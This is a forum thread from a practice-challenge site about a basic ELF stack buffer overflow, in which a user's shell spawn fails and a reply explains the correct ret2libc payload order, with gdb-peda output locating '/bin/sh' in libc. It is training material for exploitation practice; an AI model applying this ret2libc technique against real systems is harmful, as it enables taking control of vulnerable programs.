App - System
App - System ELF Stack buffer overflow basic 6
Hello guys, im getting a weird error I’m able to spawn a shell and everything its ok but when i try to spawn a shell in the terminal environment it shows up a weird python error, now i dont know where i can find help from this.
screenshot gdb: https://prnt.sc/gcm4vm
Thanks in advice ;)
aaa.png (PNG, 129.3 kb)
App - System ELF Stack buffer overflow basic 6
I might be wrong, but what you’re doing looks like a ret2libc attack, in which case:
> The payload ends with something like @system | @addr | @"/bin/sh" (and NOT the other way around !)
> So that, with the right offset, the program jumps to system after a ret thinking "/bin/sh" is its argument, and then jumps back to @addr when done.
In your case, the program called system(GIBBERISH) (where GIBBERISH is the string starting at @exit) which calls /bin/dash since any system call does but to no effect (wrong bash command), and then proceeds to jump to the address of "/bin/sh":
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xb7f84cec ("/bin/sh")
gdb-peda$ x/10i 0xb7f84cec
0xb7f84cec: das
0xb7f84ced: bound ebp,QWORD PTR [ecx+0x6e]
0xb7f84cf0: das
0xb7f84cf1: jae 0xb7f84d5b
0xb7f84cf3: add BYTE PTR [ebp+0x78],ah
0xb7f84cf6: imul esi,DWORD PTR [eax+eiz*1+0x30],0x6e616300
0xb7f84cfe: outs dx,DWORD PTR ds:[esi]
0xb7f84cff: outs dx,BYTE PTR ds:[esi]
0xb7f84d00: imul esp,DWORD PTR [ebx+0x61],0x657a696c
0xb7f84d07: arpl WORD PTR cs:[eax],ax
which will lead to "random behavior" and specially to a outs ... command which is forbidden in user mode (hence the SIGILL)
TL,DR: swap the address of /bin/sh and exit in your playload. It’s a common ret2libc mistake 😉